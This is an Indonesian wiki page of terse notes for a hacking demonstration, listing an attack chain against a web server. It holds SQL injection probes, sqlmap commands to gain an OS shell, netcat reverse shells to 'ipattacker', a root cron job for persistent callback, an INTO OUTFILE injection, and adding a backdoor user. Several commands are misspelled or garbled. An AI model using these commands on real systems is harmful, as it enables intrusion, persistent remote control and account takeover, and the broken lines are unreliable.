Hacking: Orek-Orekan Demo Hacking

Hacking: Orek-Orekan Demo Hacking netdiscover SQL Injection - GET - HOST GET index.php?id=1' kalau ada ERROR ada celah HOST username admin password " ERROR ada celah SQL injection Attack sqlmap -u "url-yangadaerror" --data="POSTDATA=diambildaritemperdata" --batch -v 3 -level=6 --risk=5 sqlmap -u "url-yangadaerror" --data="POSTDATA=diambildaritemperdata" --batch -v 0 lakukanremoteshell OS-shell> id, ls OS=shell> whereis mc OS-shell> /bin/nc.traditional ipattacker 9999 =e /bin/sh di komuter attacker nc -lvvp 9999 dapat session id pyhton -c 'impprt pty;pty.spwwan("/bin/bash/")' exploit ./john pakai burpsuite port 8080 di localhost intercept off authentikasi ulang dengan password yang salah burpsuite dapat cookies & session 200 normal 300 direct 400 error / forbidden i • * * * * root /bin/nc.traditional ipattacker 5555 -e /bin/sh --- ini utk memerinatahkan root exekusi nc nmap localhost --- check apakah port sudah di buka pakai burpsuite pakai Decoder >EDivafe AS ASCII HEX copy ASCII HEX masukan ke pakai burpsuite pakai repeater myusername=admin &mypassword=" 1=1 union elect 0x20,0x20 INTO OUTFILE * * * * * rootdst --&Submit=Login check id di OS Shell nc id dapat password root useradd domas adduser passwd Navigation menu • Log in • Page • Discussion • Read • View source • View history • Main page • Recent changes • Random page • Help about MediaWiki Tools • What links here • Related changes • Special pages • Printable version • Permanent link • Page information • This page was last edited on 16 November 2013, at 09:57.